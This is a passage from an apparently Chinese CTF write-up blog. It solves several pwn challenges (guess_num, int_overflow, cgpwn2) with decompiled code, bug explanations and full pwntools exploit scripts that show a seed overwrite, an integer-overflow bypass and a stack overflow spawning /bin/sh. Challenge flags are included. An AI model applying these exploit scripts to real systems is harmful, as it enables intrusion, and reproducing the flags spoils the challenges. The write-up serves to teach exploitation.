data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018235.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220216123235383\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u6253\u5f00\u73af\u5883\uff0c\u8fd0\u884c\u9644\u4ef6\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec guess_num\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/guess_num&#039;\n    Arch:     amd64-64-little\n    RELRO:    Partial RELRO\n    Stack:    Canary found\n    NX:       NX enabled\n    PIE:      PIE enabled\nPwn@ubuntu:~\/\u684c\u9762$ .\/guess_num \n-------------------------------\nWelcome to a guess number game!\n-------------------------------\nPlease let me know your name!\nYour name:aaa\n-------------Turn:1-------------\nPlease input your guess number:12\n---------------------------------\nGG!<\/code><\/pre>\n<p>\u6253\u5f00IDA\u770b\u4e00\u4e0bmain\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">__int64 __fastcall main(__int64 a1, char **a2, char **a3)\n{\n  int v4; \/\/ [rsp+4h] [rbp-3Ch]\n  int i; \/\/ [rsp+8h] [rbp-38h]\n  int v6; \/\/ [rsp+Ch] [rbp-34h]\n  char v7; \/\/ [rsp+10h] [rbp-30h]\n  unsigned int seed[2]; \/\/ [rsp+30h] [rbp-10h]\n  unsigned __int64 v9; \/\/ [rsp+38h] [rbp-8h]\n\n  v9 = __readfsqword(0x28u);\n  setbuf(stdin, 0LL);\n  setbuf(stdout, 0LL);\n  setbuf(stderr, 0LL);\n  v4 = 0;\n  v6 = 0;\n  *(_QWORD *)seed = sub_BB0();\n  puts(&quot;-------------------------------&quot;);\n  puts(&quot;Welcome to a guess number game!&quot;);\n  puts(&quot;-------------------------------&quot;);\n  puts(&quot;Please let me know your name!&quot;);\n  printf(&quot;Your name:&quot;, 0LL);\n  gets(&amp;v7);\n  srand(seed[0]);\n  for ( i = 0; i &lt;= 9; ++i )\n  {\n    v6 = rand() % 6 + 1;\n    printf(&quot;-------------Turn:%d-------------\\n&quot;, (unsigned int)(i + 1));\n    printf(&quot;Please input your guess number:&quot;);\n    __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n    puts(&quot;---------------------------------&quot;);\n    if ( v4 != v6 )\n    {\n      puts(&quot;GG!&quot;);\n      exit(1);\n    }\n    puts(&quot;Success!&quot;);\n  }\n  sub_C3E();\n  return 0LL;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u8981\u5341\u6b21\u731c\u4e2d\u968f\u673a\u751f\u6210\u7684\u6570\u5b57\uff0c\u4e0d\u53ef\u80fd\uff0c\u7edd\u5bf9\u4e0d\u53ef\u80fd\uff0c\u4f46\u662f\u53ef\u4ee5\u770b\u5230\u8fd9\u4e2a\u968f\u673a\u751f\u6210\u6570\u662f<code>srand()<\/code>\u751f\u6210\u7684\u4f2a\u968f\u673a\u751f\u6210\u6570\u3002<\/p>\n<p>seed \u662funsigned int \u578b\u7684 \u572864\u4f4d\u4e2d \u53604\u4e2a\u5b57\u8282 \u5c31\u662f\u56db\u4e2a\u5b57\u7b26 \u7136\u540e\u4ece\u540d\u5b57\u90a3\u5012seed\u4e2d\u95f4\u67090x20\u4e2a\uff0c\u53ef\u4ee5\u901a\u8fc7\u8986\u76d6\u6389seed\uff0c\u7528\u81ea\u5df1\u9009\u62e9\u7684\u4f5c\u4e3a\u79cd\u5b50\uff0c\u5f04\u51fa\u4e00\u6478\u4e00\u6837\u7684\u968f\u673a\u6570\u3002<\/p>\n<p>\u76f4\u63a5\u8fd0\u7528\u811a\u672c\uff0c\u8fd9\u91cc\u53c2\u8003\u7684\u662f<a href=\"https:\/\/blog.csdn.net\/u012890095\">Nathan-Yang<\/a>\u5e08\u5085\u7684\u811a\u672c\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\nfrom ctypes import *\nio = remote(&#039;111.200.241.244&#039;, 55184)\nlibc = cdll.LoadLibrary(&quot;\/lib\/x86_64-linux-gnu\/libc.so.6&quot;)\npayload = &#039;a&#039; * 0x20 + p64(1).decode()\nio.recvuntil(&#039;Your name:&#039;)\nio.sendline(payload)\nlibc.srand(1)\nfor i in range(10):\n    num = str(libc.rand()%6+1)\n    io.recvuntil(&#039;number:&#039;)\n    io.sendline(num)\nio.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u5f97\u5230flag:<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ vi exp.py\nPwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 55184: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&#039;Your name:&#039;)\nexp.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\nexp.py:11: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&#039;number:&#039;)\nexp.py:12: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(num)\n[*] Switching to interactive mode\n---------------------------------\nSuccess!\nYou are a prophet!\nHere is your flag!cyberpeace{9f895fd6555e868b189d7eae00c8c8b6}\n[*] Got EOF while reading in interactive<\/code><\/pre>\n<h2>int_overflow<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018236.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018236.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220216184211818\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec int_overflow\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/int_overflow&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\nbash: .\/int_overflow: \u6743\u9650\u4e0d\u591f\nPwn@ubuntu:~\/\u684c\u9762$ chmod -R 777 int_overflow\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\n---------------------\n~~ Welcome to CTF! ~~\n       1.Login       \n       2.Exit        \n---------------------\nYour choice:1\nPlease input your username:\nadmin\nHello admin\n\nPlease input your passwd:\npassword\nInvalid Password\nPwn@ubuntu:~\/\u684c\u9762$ .\/int_overflow\n---------------------\n~~ Welcome to CTF! ~~\n       1.Login       \n       2.Exit        \n---------------------\nYour choice:2\nBye~<\/code><\/pre>\n<p>IDA\u6253\u5f00\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/main\u51fd\u6570\nint __cdecl main(int argc, const char **argv, const char **envp)\n{\n  int v4; \/\/ [esp+Ch] [ebp-Ch]\n\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  puts(&quot;---------------------&quot;);\n  puts(&quot;~~ Welcome to CTF! ~~&quot;);\n  puts(&quot;       1.Login       &quot;);\n  puts(&quot;       2.Exit        &quot;);\n  puts(&quot;---------------------&quot;);\n  printf(&quot;Your choice:&quot;);\n  __isoc99_scanf(&quot;%d&quot;, &amp;v4);\n  if ( v4 == 1 )\n  {\n    login();\n  }\n  else\n  {\n    if ( v4 == 2 )\n    {\n      puts(&quot;Bye~&quot;);\n      exit(0);\n    }\n    puts(&quot;Invalid Choice!&quot;);\n  }\n  return 0;\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u8fd9\u6709\u4e2a<code>login()<\/code>\u51fd\u6570\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-c\">int login()\n{\n  char buf; \/\/ [esp+0h] [ebp-228h]\n  char s; \/\/ [esp+200h] [ebp-28h]\n  memset(&amp;s, 0, 0x20u);\n  memset(&amp;buf, 0, 0x200u);\n  puts(&quot;Please input your username:&quot;);\n  read(0, &amp;s, 0x19u);\n  printf(&quot;Hello %s\\n&quot;, &amp;s);\n  puts(&quot;Please input your passwd:&quot;);\n  read(0, &amp;buf, 0x199u);\n  return check_passwd(&amp;buf);\n}<\/code><\/pre>\n<p>\u7ee7\u7eed\u770b\u4e00\u4e0b\u8fd9\u4e2a<code>check_passwd()<\/code>\u51fd\u6570\uff1a<\/p>\n<pre><code class=\"language-c\">char *__cdecl check_passwd(char *s)\n{\n  char *result; \/\/ eax\n  char dest; \/\/ [esp+4h] [ebp-14h]\n  unsigned __int8 v3; \/\/ [esp+Fh] [ebp-9h]\n  v3 = strlen(s);\n  if ( v3 &lt;= 3u || v3 &gt; 8u )\n  {\n    puts(&quot;Invalid Password&quot;);\n    result = (char *)fflush(stdout);\n  }\n  else\n  {\n    puts(&quot;Success&quot;);\n    fflush(stdout);\n    result = strcpy(&amp;dest, s);\n  }\n  return result;\n}<\/code><\/pre>\n<ul>\n<li><code>v3<\/code> \u8bbe\u7f6e\u4e86\u4e00\u4e2a <code>unsigned _int8 v3<\/code> \u65e0\u7b26\u53f7 8\u4f4d\u53c2\u6570\uff0c\u957f\u5ea6\u6700\u5927\u4e3a8\u4f4d 255\u3002<\/li>\n<li>\u8d4b\u503c\u7684\u8fc7\u7a0b\u4e2d\uff0c\u7f16\u8bd1\u5668\u4f1a\u622a\u65ad\u540e\u8005\u7684\u672b\u516b\u4f4d\u8d4b\u503c\u7ed9\u524d\u8005\u30028\u4f4d\u7684\u6700\u5927\u503c\u662f 255 \uff0c\u6240\u4ee5\u5982\u679cpasswd\u5b57\u7b26\u4e32\u957f\u5ea6\u8d85\u8fc7255\u5c31\u4f1a\u5bfc\u81f4\u6ea2\u51fa\u3002<\/li>\n<li>\u770b\u5230\u4e0a\u4e00\u5c42 read \u8bfb\u53d6\u7684\u65f6\u5019 \u53ef\u4ee5\u8bfb\u53d6\u5230 <code>0x199<\/code> \u4f4d\u6570\u636e \u8fdc\u8fdc\u5927\u4e8e 255<\/li>\n<\/ul>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018237.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018237.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217203523072\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u6839\u636e\u4e0a\u9762\u8bf4\u7684\u6ea2\u51fa\u90e8\u5206\u81ea\u52a8\u622a\u53d6\u540e\u516b\u4f4d\uff0c\u90a3\u4e48\u53ea\u9700\u8981\u5728 255 \u7684\u57fa\u7840\u4e0a\u52a0\u4e0a\u539f\u672c\u9650\u5236\u7684 4 - 8 \uff0c\u5373\u53ef\u5c06\u6ea2\u51fa\u90e8\u5206\u8d4b\u7ed9 v3 \uff0c\u4ece\u800c\u7ed5\u8fc7if\u5224\u65ad\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018238.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018238.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217194147104\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u800c\u4e14\u5728 <code>string<\/code> \u89c6\u56fe(<code>shift+F12<\/code>)\u5185\u8fd8\u53ef\u4ee5\u770b\u5230 <code>cat flag <\/code><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018239.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018239.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217205654195\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u53ef\u4ee5\u627e\u5230\uff1a<\/p>\n<pre><code>int what_is_this()\n{\n  return system(&quot;cat flag&quot;);\n}<\/code><\/pre>\n<p>\u77e5\u9053\u539f\u7406\uff0c\u5199exp\u5c31\u884c\u4e86\uff1a<\/p>\n<pre><code class=\"language-python\">from pwn import *\nio=remote(&quot;111.200.241.244&quot;,64586)\nio.sendlineafter(&quot;Your choice:&quot;, &quot;1&quot;)\nio.sendlineafter(&quot;your username:&quot;, &quot;kk&quot;)\nio.recvuntil(&quot;your passwd:&quot;)\npayload = &quot;a&quot; * 0x14 + &quot;aaaa&quot; + p32(0x0804868B)+&quot;a&quot;*234\nio.sendline(payload)\nio.recv()\nio.interactive()<\/code><\/pre>\n<p>\u5f97\u5230flag:<\/p>\n<pre><code>Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 64586: Done\nexp.py:3: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendlineafter(&quot;Your choice:&quot;, &quot;1&quot;)\n\/home\/baoyujie\/.local\/lib\/python3.8\/site-packages\/pwnlib\/tubes\/tube.py:822: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  res = self.recvuntil(delim, timeout=timeout)\nexp.py:4: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendlineafter(&quot;your username:&quot;, &quot;kk&quot;)\nexp.py:5: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;your passwd:&quot;)\nexp.py:7: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\n[*] Switching to interactive mode\nSuccess\ncyberpeace{5f5d5aa7b93a146d4f0f4855f819f938}<\/code><\/pre>\n<h2>cgpwn2<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018240.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018240.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217223157440\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8001\u6837\u5b50\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ checksec cgpwn2\n[*] &#039;\/home\/baoyujie\/\u684c\u9762\/cgpwn2&#039;\n    Arch:     i386-32-little\n    RELRO:    Partial RELRO\n    Stack:    No canary found\n    NX:       NX enabled\n    PIE:      No PIE (0x8048000)\nPwn@ubuntu:~\/\u684c\u9762$ .\/cgpwn2\nplease tell me your name\naaa\nhello,you can leave some message here:\nasd\nthank you<\/code><\/pre>\n<p>\u6253\u5f00IDA\u67e5\u770b\u4e00\u4e0b<code>main\u51fd\u6570<\/code>\uff1a<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  setbuf(stderr, 0);\n  hello();\n  puts(&quot;thank you&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>\u518d\u770b\u4e00\u4e0b<code>hello()\u51fd\u6570<\/code>:<\/p>\n<pre><code class=\"language-c\">char *hello()\n{\n  char *v0; \/\/ eax\n  signed int v1; \/\/ ebx\n  unsigned int v2; \/\/ ecx\n  char *v3; \/\/ eax\n  char s; \/\/ [esp+12h] [ebp-26h]\n  int v6; \/\/ [esp+14h] [ebp-24h]\n\n  v0 = &amp;s;\n  v1 = 30;\n  if ( (unsigned int)&amp;s &amp; 2 )\n  {\n    *(_WORD *)&amp;s = 0;\n    v0 = (char *)&amp;v6;\n    v1 = 28;\n  }\n  v2 = 0;\n  do\n  {\n    *(_DWORD *)&amp;v0[v2] = 0;\n    v2 += 4;\n  }\n  while ( v2 &lt; (v1 &amp; 0xFFFFFFFC) );\n  v3 = &amp;v0[v2];\n  if ( v1 &amp; 2 )\n  {\n    *(_WORD *)v3 = 0;\n    v3 += 2;\n  }\n  if ( v1 &amp; 1 )\n    *v3 = 0;\n  puts(&quot;please tell me your name&quot;);\n  fgets(name, 50, stdin);\n  puts(&quot;hello,you can leave some message here:&quot;);\n  return gets(&amp;s);\n}<\/code><\/pre>\n<p>\u6211\u4eec\u8fd8\u5728\u5176\u4ed6\u51fd\u6570\u91cc\u627e\u5230\u4e86system\uff0c\u4f46\u662f\u6ca1\u6709\u4ec0\u4e48\u6709\u4ef7\u503c\u7684\u4e1c\u897f\uff1a<\/p>\n<pre><code class=\"language-c\">int pwn()\n{\n  return system(&quot;echo hehehe&quot;);\n}<\/code><\/pre>\n<p>\u53ef\u4ee5\u770b\u5230\u7b2c\u4e00\u4e2a\u8f93\u5165\u70b9\u6709\u4e00\u4e2aname\uff0c\u70b9\u51fb\u8ddf\u8fdb\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018241.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018241.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220217232120029\" style=\"zoom:33%;\" \/><\/div><\/p>\n<ul>\n<li>name\u5728bss\u6bb5\u4e2d\uff0c\u5730\u5740\u56fa\u5b9a\u4e0d\u53d8<\/li>\n<li>\u53ef\u4ee5\u5229\u7528fgets\u51fd\u6570\u5411\u5176\u4e2d\u5199\u4e1c\u897f<\/li>\n<li>\u7a0b\u5e8f\u4e2d\u8c03\u7528\u4e86system\u51fd\u6570\uff0c\u4f46\u662f\u6ca1\u6709\/bin\/sh<\/li>\n<\/ul>\n<p>\u53ef\u4ee5\u901a\u8fc7\u6808\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8c03\u7528system\u51fd\u6570\uff0c\u5411name\u4e2d\u5199\u5165<code>\/bin\/sh<\/code>\uff0c\u628a\u53c2\u6570\u5730\u5740\u8bbe\u7f6e\u4e3aname\u7684\u9996\u5730\u5740\u3002<\/p>\n<pre><code class=\"language-python\">#exp.py\n#!usr\/bin\/python\nfrom pwn import *\nio = remote(&quot;111.200.241.244&quot;,63685)\ncontext.log_level = &#039;debug&#039;\nio.recvuntil(&quot;your name&quot;)\nio.sendline(&quot;\/bin\/sh&quot;)\nio.recvuntil(&quot;leave some message here:&quot;)\npayload  = &quot;a&quot; * 0x26 + &quot;aaaa&quot; + p32(0x08048420).decode(&#039;unicode_escape&#039;) + &quot;aaaa&quot; + p32(0x0804A080).decode(&#039;unicode_escape&#039;)\nio.sendline(payload)\nio.interactive()<\/code><\/pre>\n<p>\u8fd0\u884c\u5373\u53ef\u5f97\u5230flag\uff1a<\/p>\n<pre><code class=\"language-bash\">Pwn@ubuntu:~\/\u684c\u9762$ python exp.py \n[+] Opening connection to 111.200.241.244 on port 63685: Done\nexp.py:6: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;your name&quot;)\n[DEBUG] Received 0x18 bytes:\n    b&#039;please tell me your name&#039;\nexp.py:7: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(&quot;\/bin\/sh&quot;)\n[DEBUG] Sent 0x8 bytes:\n    b&#039;\/bin\/sh\\n&#039;\nexp.py:8: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.recvuntil(&quot;leave some message here:&quot;)\n[DEBUG] Received 0x1 bytes:\n    b&#039;\\n&#039;\n[DEBUG] Received 0x27 bytes:\n    b&#039;hello,you can leave some message here:\\n&#039;\nexp.py:10: BytesWarning: Text is not bytes; assuming ISO-8859-1, no guarantees. See https:\/\/docs.pwntools.com\/#bytes\n  io.sendline(payload)\n[DEBUG] Sent 0x37 bytes:\n    00000000  61 61 61 61  61 61 61 61  61 61 61 61  61 61 61 61  \u2502aaaa\u2502aaaa\u2502aaaa\u2502aaaa\u2502\n    *\n    00000020  61 61 61 61  61 61 61 61  61 61 20 84  04 08 61 61  \u2502aaaa\u2502aaaa\u2502aa \u00b7\u2502\u00b7\u00b7aa\u2502\n    00000030  61 61 80 a0  04 08 0a                               \u2502aa\u00b7\u00b7\u2502\u00b7\u00b7\u00b7\u2502\n    00000037\n[*] Switching to interactive mode\n\n$ ls\n[DEBUG] Sent 0x3 bytes:\n    b&#039;ls\\n&#039;\n[DEBUG] Received 0x24 bytes:\n    b&#039;bin\\n&#039;\n    b&#039;cgpwn2\\n&#039;\n    b&#039;dev\\n&#039;\n    b&#039;flag\\n&#039;\n    b&#039;lib\\n&#039;\n    b&#039;lib32\\n&#039;\n    b&#039;lib64\\n&#039;\nbin\ncgpwn2\ndev\nflag\nlib\nlib32\nlib64\n$ cat flag\n[DEBUG] Sent 0x9 bytes:\n    b&#039;cat flag\\n&#039;\n[DEBUG] Received 0x2d bytes:\n    b&#039;cyberpeace{78b0c6c2bad0d97333324124764d0dd0}\\n&#039;\ncyberpeace{78b0c6c2bad0d97333324124764d0dd0}<\/code><\/pre>\n<h2>level3<\/h2>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018242.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018242.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218124757725\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u9898\u76ee\u9644\u4ef6\u6253\u5f00\u662f\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u538b\u7f29\u5305\u89e3\u538b\u7f29\u4ee5\u540e\u5728 windows \u663e\u793a\u6b63\u5e38\u662f\u6587\u6863\uff0c\u4f46\u5728linux\u663e\u793a\u8fd8\u662f\u4e00\u4e2a\u538b\u7f29\u5305\uff0c\u4e14\u63d0\u53d6\u89e3\u538b\u4f1a\u4ea7\u751f\u9519\u8bef\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018243.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018243.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20220218131150588\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<p>\u8fdc\u7a0b\u8fde\u63a5\u4e00\u4e0b\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/Desktop]\n\u2514\u2500$ nc 111.200.241.244 52403\nInput:\n123456789    \nHello, World!<\/code><\/pre>\n<p>\u5c1d\u8bd5\u4e86\u5f88\u957f\u65f6\u95f4\uff0c\u7ec8\u4e8e\u6210\u529f\uff01\uff01\uff01\uff01\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202402040018244.png'><img class=\"lazyload lazyload-style-2\" 